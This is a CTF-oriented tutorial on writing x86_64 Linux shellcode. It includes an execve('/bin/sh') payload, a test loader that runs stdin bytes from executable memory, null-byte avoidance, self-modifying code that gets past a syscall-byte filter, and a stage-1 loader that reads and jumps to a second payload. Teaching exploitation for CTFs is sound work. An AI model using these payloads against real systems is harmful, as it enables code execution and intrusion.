I trust that whoever is reading this article is not a layman: you are probably familiar with CTFs, have overflowed a buffer and smashed the stack at least once, and know what you are getting yourself into. I assume you know what a CTF challenge is, the basics of x86 assembly, and how to use Linux.
The term “shellcode” originates from the usual objective of an exploit: executing a command shell such as /bin/sh. The code is written in assembly language.
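# execve("/bin/sh", {NULL}, {NULL})
.intel_syntax noprefix
.text
.global _start
_start:
    mov rax, 0x68732f6e69622f   # "/bin/sh\0" as a little-endian qword
    push rax
    push rsp
    pop rdi                     # rdi = pointer to "/bin/sh"
    xor eax, eax
    push rax                    # NULL qword on the stack
    mov al, 59                  # execve syscall number
    push rsp
    pop rdx                     # rdx = envp = {NULL}
    push rsp
    pop rsi                     # rsi = argv = {NULL}
    syscall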
Looking at this code for the first time is intimidating. But once you learn how to read it, writing shellcode becomes the easiest part of the job.
How does it execute
Shellcode is simply executable bytes: machine instructions assembled to perform a small task once control flow has been hijacked.
Computers follow one of two broad designs: the Von Neumann architecture, which stores code and data in the same memory and can therefore treat code as data, and the Harvard architecture, which stores code and data separately.
From the programmer's point of view, almost all general-purpose architectures (x86, ARM, MIPS, etc.) behave as Von Neumann machines. They are the focus of this article.
Starting out, we will use a simple shellcode loader to test and execute our shellcode.
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h> // for read()

int main(void) {
    // 1. Allocate an executable memory page.
    //    PROT_READ | PROT_WRITE | PROT_EXEC: The memory can be read, written to, and executed.
    //    MAP_PRIVATE | MAP_ANON: The mapping is private to this process and not backed by a file.
    void *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANON, -1, 0);

    if (page == MAP_FAILED) {
        perror("mmap failed");
        return 1;
    }

    printf("[+] Memory allocated at: %p\n", page);

    // 2. Read shellcode from standard input (stdin) into the allocated page.
    printf("[+] Reading shellcode from stdin...\n");
    ssize_t bytes_read = read(STDIN_FILENO, page, 4095);

    if (bytes_read <= 0) {
        perror("read failed or no input provided");
        return 1;
    }

    // %zd is the correct format specifier for ssize_t.
    printf("[+] Read %zd bytes. Executing now...\n", bytes_read);

    // 3. Create a function pointer to the page and call it.
    //    This transfers execution to the shellcode.
    void (*shellcode_func)(void) = (void (*)(void))page;
    shellcode_func();

    // This line will likely not be reached if the shellcode exits.
    return 0;
}
Shellcode is just bytes. If you want to execute it, those bytes must live in memory marked as executable.
The mmap call is important. If we requested memory without PROT_EXEC, then the moment the program tried to execute the code at page, the CPU’s memory management unit would see the “No-Execute” permission on that page and trigger a protection fault, resulting in a SIGSEGV.
We are asking for a single page (0x1000 bytes) of memory that is:
- Writable: we load the shellcode bytes into it using read.
- Executable: the CPU will happily jmp into it without complaining.
void *page = mmap(
    NULL,                // Let the kernel choose the address
    4096,                // One page = 4096 bytes (common page size)
    PROT_READ | PROT_WRITE | PROT_EXEC, // Permissions: read, write, execute
    MAP_PRIVATE | MAP_ANON, // Private mapping, not backed by a file
    -1,                  // File descriptor (-1 since it's anonymous)
    0                    // Offset (not used here)
);
The loader is not compiled with the default gcc configuration. By default, modern compilers enable protections that get in the way of shellcode, so you need to disable them when compiling the program.
gcc -ggdb -g3 execute.c -fno-stack-protector -z execstack -no-pie -fno-pie -o execute
Running checksec shows Stack: Executable, which means that data on the stack can be treated as code.
$ pwn checksec --file=execute
[*] '/tmp/test/execute'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
Writing Shellcode
Before I start writing shellcode, I open plenty of documentation: syscall tables and the manual for whatever architecture I am targeting. To mention a few, I use Systrack's Linux kernel syscall tables for syscall lookups, and Felix Cloutier’s x86 and amd64 instruction reference, which is easier to navigate than the official Intel manual, although that works too.
When writing shellcode, your goal is to execute syscalls (system calls). They are the special functions your program uses to talk to the kernel:
- read to ask the kernel to read from a file.
- write to ask the kernel to write to a file.
- execve to ask the kernel to run another program.
- exit to tell the kernel you are done and exit cleanly.
Syscalls are functions and, like any other function, they take parameters. It is not as easy as function(arg1, arg2, arg3), but you learn to do it: the syscall number goes in the RETURN register (eax/rax), which also receives the result, and each argument goes in its own register.
Syscall calling convention for the x86 and x86_64 architectures:
| ARCH | RETURN | ARG0 | ARG1 | ARG2 | ARG3 | ARG4 | ARG5 | 
|---|---|---|---|---|---|---|---|
| x86 | eax | ebx | ecx | edx | esi | edi | ebp | 
| x64 | rax | rdi | rsi | rdx | r10 | r8 | r9 | 
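To make the table concrete, here is a minimal Python sketch that maps a syscall and its arguments onto registers. The names SYSCALL_REGS and assign_registers are hypothetical helpers written for illustration, not part of any library; the register order is copied from the table above.

```python
# Register order taken from the table above: (number/return, arg0..arg5).
SYSCALL_REGS = {
    "x86": ("eax", "ebx", "ecx", "edx", "esi", "edi", "ebp"),
    "x64": ("rax", "rdi", "rsi", "rdx", "r10", "r8", "r9"),
}


def assign_registers(arch, number, *args):
    """Return {register: value} for a syscall with the given arguments."""
    number_reg, *arg_regs = SYSCALL_REGS[arch]
    if len(args) > len(arg_regs):
        raise ValueError("a syscall takes at most six arguments")
    layout = {number_reg: number}
    layout.update(zip(arg_regs, args))
    return layout


# exit(0) on x86_64: syscall number 60 in rax, status in rdi.
print(assign_registers("x64", 60, 0))  # {'rax': 60, 'rdi': 0}
```

Reading the result top to bottom gives the order in which a shellcode has to load its registers before the syscall instruction.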
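To write shellcode, you look up the number of the syscall you want. The simplest example is the exit syscall. Looking up exit in the man pages, you find this definition (it describes the libc wrapper, but the raw syscall takes the same single status argument):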
exit - cause normal process termination
#include <stdlib.h>
[[noreturn]] void exit(int status);
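It takes only one parameter, the exit status. On Unix-like systems, a successful exit is exit(0), so let's write that in shellcode. Never mind the directives and the _start label at the top; they matter to the assembler, not to us in this case. Note that the snippet only loads the syscall number: the status in rdi is never set, and the program exits with 0 only because, on Linux, rdi is already zero when a freshly started static binary reaches _start. Inside a hijacked process, set rdi explicitly.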
.intel_syntax noprefix

.global _start

_start:
    mov rax, 60      # syscall number for exit
    syscall          # invoke the syscall
Assemble and link the shellcode with the following command.
gcc -nostdlib -static hello.S -o hello.elf
This creates an ELF file. Inspect it with objdump to see the disassembly.
$ objdump -d -Mintel hello.elf
hello.elf:     file format elf64-x86-64
Disassembly of section .text:
0000000000401000 <_start>:
  401000:   48 c7 c0 3c 00 00 00   mov    rax,0x3c
  401007:   0f 05                  syscall
We only want the .text section of the ELF file. To extract it, use objcopy:
objcopy --dump-section .text=hello.bin hello.elf
Use xxd to view the raw assembled bytes. They match the byte column of the objdump listing.
$ xxd hello.bin
00000000: 48c7 c03c 0000 000f 05                   H..<.....
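Exploit scripts usually want these bytes as an escaped string rather than a hex dump. A minimal Python sketch, assuming the nine bytes shown in the objdump listing for hello.elf; to_escaped is a hypothetical helper name.

```python
def to_escaped(shellcode: bytes) -> str:
    r"""Format raw bytes as the body of a \x-escaped string literal."""
    return "".join(f"\\x{byte:02x}" for byte in shellcode)


# Bytes of `mov rax, 0x3c; syscall`, copied from the objdump listing.
shellcode = bytes.fromhex("48 c7 c0 3c 00 00 00 0f 05")

print(len(shellcode))         # 9
print(to_escaped(shellcode))  # \x48\xc7\xc0\x3c\x00\x00\x00\x0f\x05
```

The escaped form can be pasted into a C string or a Python bytes literal, and the length tells you how much of your byte budget the payload uses.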
You can run the ELF file just like any other Linux program. It exits with status 0; to check the status, run echo $?.
./hello.elf
echo $?
# 0
For more detail, use strace to watch the syscalls being executed.
strace ./hello.elf
# execve("./hello.elf", ["./hello.elf"], 0x7ffe3fbd8560 /* 73 vars */) = 0
# exit(0)                                 = ?
# +++ exited with 0 +++
Enough with the long introduction. Let's get into the notes.
Problems you would run into when writing shellcode
Here are some of the common problems you will eventually run into when writing shellcode.
Size constraints (Byte budget hell)
Your goal is to use as few bytes as possible.
XOR Instruction
Be careful about using mov too much. To zero out a register, do not use mov; use xor instead. On x86_64, writing a 32-bit register zero-extends into the full 64-bit register, so the 2-byte xor eax, eax clears all of rax.
mov    al,0x0       ; b0 00
mov    ax,0x0       ; 66 b8 00 00
mov    eax,0x0      ; b8 00 00 00 00
mov    rax,0x0      ; 48 c7 c0 00 00 00 00

xor    al,al        ; 30 c0
xor    ax,ax        ; 66 31 c0
xor    eax,eax      ; 31 c0
xor    rax,rax      ; 48 31 c0
Push Pop
Push a value onto the stack and get it back with pop. For immediates that fit in a sign-extended 32 bits, this is one byte shorter than mov.
;; 7 bytes
mov rax, 0xbadc0de      ; 48 c7 c0 de c0 ad 0b

;; 6 bytes
push   0xbadc0de        ; 68 de c0 ad 0b
pop    rax              ; 58
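The byte counts can be tallied with a few lines of Python. This is a minimal sketch: the encodings are copied from the listings in this section, and the ENCODINGS table and size helper are hypothetical names used only for illustration.

```python
# Encodings copied from the listings above (instruction -> machine code).
ENCODINGS = {
    "mov rax, 0x0": "48 c7 c0 00 00 00 00",
    "xor rax, rax": "48 31 c0",
    "xor eax, eax": "31 c0",
    "mov rax, 0xbadc0de": "48 c7 c0 de c0 ad 0b",
    "push 0xbadc0de; pop rax": "68 de c0 ad 0b 58",
}


def size(instruction: str) -> int:
    """Number of bytes the listed encoding occupies."""
    return len(bytes.fromhex(ENCODINGS[instruction]))


for instruction in ENCODINGS:
    print(f"{size(instruction)} bytes  {instruction}")

# Bytes saved by each substitution.
print(size("mov rax, 0x0") - size("xor eax, eax"))                   # 5
print(size("mov rax, 0xbadc0de") - size("push 0xbadc0de; pop rax"))  # 1
```

A single byte looks negligible, but in a challenge with a 20 or 30 byte limit these savings add up quickly.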
Use what you have
When you hijack the control flow (e.g. via jmp rax), some registers may already hold useful values. For example, if rdx is non-zero when you are about to make a read syscall, use it as-is for the count parameter. This is situation dependent, but you get the point.
Strings
If you think strings are hard in C, let me introduce you to x86_64.
I will use the open syscall as an example.
# open("/flag", O_RDONLY)
mov rbx, 0x67616c662f           # "/flag" as a little-endian qword
push rbx                        # the string now lives on the stack
mov rax, 2                      # open() syscall number
mov rdi, rsp                    # rdi points to the top of the stack ("/flag")
mov rsi, 0                      # second arg: flags = O_RDONLY (0)
syscall                         # open("/flag", O_RDONLY)
The value 0x67616c662f is /flag in little-endian byte order. To reproduce it, run the following command.
echo -ne "/flag" | rev | xxd -p
# 67616c662f
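The same conversion can be done in Python without shelling out. A minimal sketch, where to_immediate is a hypothetical helper name; it relies only on int.from_bytes from the standard library.

```python
def to_immediate(text: bytes) -> int:
    """Interpret a string of up to 8 bytes as a little-endian integer."""
    if len(text) > 8:
        raise ValueError("does not fit in a 64-bit register")
    return int.from_bytes(text, "little")


print(hex(to_immediate(b"/flag")))    # 0x67616c662f
print(hex(to_immediate(b"/bin/sh")))  # 0x68732f6e69622f
```

Strings shorter than eight bytes leave the upper bytes of the register at zero, which gives you the null terminator for free, at the cost of null bytes in the encoded instruction.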
The downside is that you will struggle with long strings, as they may not fit in a register. Another way is to use labels. I prefer this way, but it may not always work.
# open("/flag", O_RDONLY)
push 2
pop rax                 # open syscall = 2

lea rdi, [rip+flag]     # rdi = address of the flag string
xor rsi, rsi            # O_RDONLY = 0

syscall

flag:
  .string "/flag"
There is also building the string on the stack. It almost always works, but it requires a lot of work.
# open("/flag", O_RDONLY)
# load "flag" (little-endian) into rax
push 0x67616C66
pop  rax                        # rax = 0x0000000067616C66

# shift left 8 bits to make room for the '/' byte
shl  rax, 8                     # rax = 0x00000067616C6600
# load '/' (0x2F) into rbx using push/pop
push 0x2F
pop  rbx                        # rbx = 0x...0000002F

# OR the '/' into the low byte
or   rax, rbx                   # rax = 0x00000067616C662F
# push the 64-bit qword (stack gets "/flag\0\0\0" in little-endian)
push rax

push 2                          # open syscall
pop rax

lea rdi, [rsp]                  # filename = "/flag"
xor rsi, rsi                    # flags = O_RDONLY

syscall
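For strings longer than eight bytes, the same idea extends to several pushes. The sketch below is one possible approach, not the only one: stack_chunks is a hypothetical helper that null-terminates the string, pads it to a multiple of eight bytes, and returns the qwords in the order they must be pushed (last chunk first, because the stack grows downward). The path /home/ctf/flag.txt is made up for the example.

```python
def stack_chunks(text: bytes) -> list:
    """Return the qwords to push, in push order, so rsp ends at the string."""
    data = text + b"\x00"                      # null terminator
    data += b"\x00" * (-len(data) % 8)         # pad to a multiple of 8 bytes
    chunks = [data[i:i + 8] for i in range(0, len(data), 8)]
    # Push the tail first so the head of the string ends up at the lowest address.
    return [int.from_bytes(chunk, "little") for chunk in reversed(chunks)]


for value in stack_chunks(b"/home/ctf/flag.txt"):
    # A 64-bit immediate cannot be pushed directly, so go through a register.
    print(f"mov rax, {value:#x}")
    print("push rax")
```

After the last push, rsp points at the first byte of the string. The generated immediates may still contain null bytes, so a filtered target needs further tricks on top of this.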
Input filtering
Input may be manipulated or have certain bytes filtered out before execution.
String termination & null bytes
Functions such as strcpy stop copying at the first null byte, so a null byte inside the shellcode truncates it. One great resource I found is nets.ec/Shellcode/Null-free, which has many great examples.
- Use the xor instruction instead of mov
This uses fewer bytes and avoids null bytes.
# bad
mov rax, 0

# good
xor rax, rax
- Use push and pop instructions instead of mov
push 0x70
pop rax
syscall
- Use shifting instructions
mov     rdi, 0x68732f6e69622f6a   ; 64-bit immediate: "j/bin/sh" in memory order, 'j' is a filler byte
shr     rdi, 8                    ; shift out the filler; the top byte becomes 0, giving "/bin/sh\0"
push    rdi                       ; push the qword; the stack now holds the null-terminated string
push    rsp                       ; push the current stack pointer
pop     rdi                       ; rdi now points at "/bin/sh"
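Before sending a payload, it helps to check it against the filter offline. A minimal sketch, assuming the filter simply rejects certain byte values; find_bad_bytes is a hypothetical helper, and the two byte strings are the mov and xor encodings listed earlier in this article.

```python
def find_bad_bytes(shellcode: bytes, bad: bytes = b"\x00") -> list:
    """Return (offset, byte) pairs for every forbidden byte in the shellcode."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


mov_rax_0 = bytes.fromhex("48 c7 c0 00 00 00 00")  # mov rax, 0
xor_rax_rax = bytes.fromhex("48 31 c0")            # xor rax, rax

print(find_bad_bytes(mov_rax_0))    # [(3, 0), (4, 0), (5, 0), (6, 0)]
print(find_bad_bytes(xor_rax_rax))  # []
```

Pass a different bad set, for example b"\x00\x0a", when the challenge also filters newlines or other bytes.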
Self modifying shellcode
Once, I was solving a CTF challenge that filtered the syscall bytes 0F 05. I wrote shellcode that constructs the 0F 05 bytes at runtime so they never appear in the input. The following code increments the 0E byte by 1 so it becomes 0F, which bypasses the filter. This only works when the shellcode sits in writable memory.
inc BYTE PTR [rip]
.byte 0x0e, 0x05
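The effect can be simulated in Python. This is a sketch under stated assumptions: the filter is modeled as a plain substring check for 0F 05, and the six bytes FE 05 00 00 00 00 are my own encoding of inc BYTE PTR [rip] with a zero displacement, so verify them with your assembler before relying on them.

```python
SYSCALL = b"\x0f\x05"

# Assumed encoding of `inc BYTE PTR [rip]`, followed by the 0e 05 placeholder.
inc_rip = bytes.fromhex("fe 05 00 00 00 00")
payload = inc_rip + b"\x0e\x05"


def passes_filter(data: bytes) -> bool:
    """Model of a filter that rejects input containing the syscall opcode."""
    return SYSCALL not in data


def run_inc(data: bytes) -> bytes:
    """Apply the inc to the byte right after the instruction, as the CPU would."""
    memory = bytearray(data)
    target = len(inc_rip)          # rip points at the next instruction
    memory[target] = (memory[target] + 1) & 0xFF
    return bytes(memory)


print(passes_filter(payload))            # True
print(run_inc(payload)[-2:] == SYSCALL)  # True
```

Note that this particular encoding contains null bytes in its displacement, so a target that also filters nulls would need a different addressing form.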
NOP Padding
nop is an instruction that does nothing. It is useful for padding, alignment, and similar purposes.
.global _start

_start:
    # Your code here
    nop
    nop
    #...
    nop

    .fill 10, 1, 0x90    # 10 NOP instructions
    # or
    .rept 10
        nop
    .endr

    # More code here
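When the payload is built in a script rather than by the assembler, the same padding is a one-liner. A minimal sketch; pad_with_nops is a hypothetical helper and the 16-byte target size is arbitrary.

```python
NOP = b"\x90"


def pad_with_nops(shellcode: bytes, size: int, front: bool = False) -> bytes:
    """Pad shellcode to exactly `size` bytes with NOPs (a sled if front=True)."""
    if len(shellcode) > size:
        raise ValueError("shellcode is larger than the target size")
    padding = NOP * (size - len(shellcode))
    return padding + shellcode if front else shellcode + padding


exit_code = bytes.fromhex("48 c7 c0 3c 00 00 00 0f 05")  # mov rax, 60; syscall
print(pad_with_nops(exit_code, 16, front=True).hex())
```

Padding at the front gives a NOP sled that tolerates an imprecise jump target; padding at the back is handy when the input must have an exact length.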
Multi stage shellcode
Sometimes the input filtering is so strict that it is impossible to write shellcode that does anything meaningful. One way around this is multi-stage shellcode: write a stage 1 “loader” whose only job is to read in another shellcode. Only stage 1 passes through the filter. The loader below reads stage 2 onto the stack, so it assumes the stack is executable.
push 0
push 0
pop rax         # rax = 0: read syscall
pop rdi         # rdi = 0: stdin

push rsp
pop rsi         # rsi = rsp (buffer)

push 100
pop rdx         # rdx = 100 bytes to read

syscall

jmp rsp         # jump to the freshly read stage 2
Use Pwntools when possible
Pwntools has lots of functions that automate and ease the process of writing shellcode. Sometimes you don’t need to write shellcode at all; it does it for you. But first you have to understand how the magic works, otherwise you will waste a lot of time. RTFM.
Pwn shellcraft
pwn shellcraft -l                       # List available shellcodes
pwn shellcraft -l amd                   # List shellcodes with "amd" in the name
pwn shellcraft -f hex amd64.linux.sh    # Print the shellcode as hex
pwn shellcraft -r amd64.linux.sh        # Run it to test; spawns a shell
Pwn template
I like to use the pwn template command to generate a starting point for my challenges.
Then use the asm() function to write the shellcode instead of compiling it and passing it through the shell by hand.
stage1 = asm("""# shellcode loader""")
stage2 = asm("""# actual shellcode""")

io.sendline(stage1)
pause(1)            # give stage 1 time to reach its read syscall
io.sendline(stage2)

io.interactive()
GDB Debugger
Using a debugger is essential. gdb is good but it lacks features, which is why I recommend using pwndbg or gef with it. They help with visualisation and provide functions that are useful for debugging.
gdbscript = f'''

# break points
#...

source /opt/gef/gef.py
continue
'''
References
- https://shell-storm.org/shellcode/index.html
- https://pwn.college/program-security/program-security/
- https://www.felixcloutier.com/x86/
- https://syscalls.mebeim.net/?table=x86/64/x64/latest
- https://www.abatchy.com/2017/04/shellcode-reduction-tips-x86
- https://nets.ec/Shellcode/Null-free
- https://book.hacktricks.wiki/en/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html